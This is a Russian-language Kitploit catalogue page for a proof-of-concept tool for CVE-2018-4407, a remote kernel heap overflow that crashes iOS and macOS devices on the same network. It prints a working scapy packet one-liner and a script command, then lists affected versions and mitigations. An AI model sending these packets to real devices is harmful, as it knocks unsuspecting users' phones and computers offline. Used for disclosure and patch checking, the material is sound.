Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
check_icmp_dos — iOS 12 / OS X удаленное переполнение кучи ядра (CVE-2018-4407) POC | Kitploit
Инструменты/GitHubGitHub/pa55w0rd/check_icmp_dos
Безопасность iOSАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеМобильная безопасность
GitHubpa55w0rd/check_icmp_dos

check_icmp_dos

iOS 12 / OS X удаленное переполнение кучи ядра (CVE-2018-4407) POC

Репозиторий
601037 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

check_icmp_dos

*iOS 12 / OS X Удаленное переполнение кучи ядра (CVE-2018-4407) POC:

root@kitploit:~
pip install scapy
sudo scapy 
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

Или используйте скрипт

root@kitploit:~
python check_icmp_dos.py 127.0.0.1

Эта уязвимость позволяет злоумышленнику, подключившемуся к той же сети Wi-Fi, отправлять вредоносные пакеты ничего не подозревающим пользователям, что приводит к сбою и перезагрузке любого Mac или iOS-устройства. Поскольку уязвимость находится в сетевом коде ядра системы, никакое антивирусное программное обеспечение не может её предотвратить.

Уязвимы устройства под управлением следующих операционных систем:

root@kitploit:~
Apple iOS 11 и более ранние версии: все устройства (часть устройств, обновлённых до iOS 12)

Apple macOS High Sierra (максимальная затронутая версия 10.13.6): все устройства (исправлено в обновлении безопасности 2018-001)

Apple macOS Sierra (максимальная затронутая версия 10.12.6): все устройства (исправлено в обновлении безопасности 2018-005)

Apple OS X El Capitan и более ранние версии: все устройства

Рекомендации по исправлению

В настоящее время Apple выпустила обновление iOS 12.1, исправляющее данную уязвимость. Пользователям рекомендуется своевременно проверить версию системы и при необходимости принять меры по исправлению. Меры по устранению уязвимости:

  1. Выполните обновление системы до последней версии.
  2. Если обновление до последней версии невозможно, включение скрытого режима в брандмауэре macOS может предотвратить атаку. Этот параметр системы по умолчанию не включён, его необходимо активировать вручную.
  3. Не подключайтесь к общедоступным беспроводным сетям. Единственным обязательным условием для эксплуатации данной уязвимости является нахождение в одной сети; уязвимость не поддерживает отправку вредоносных пакетов через Интернет.
Скачать инструмент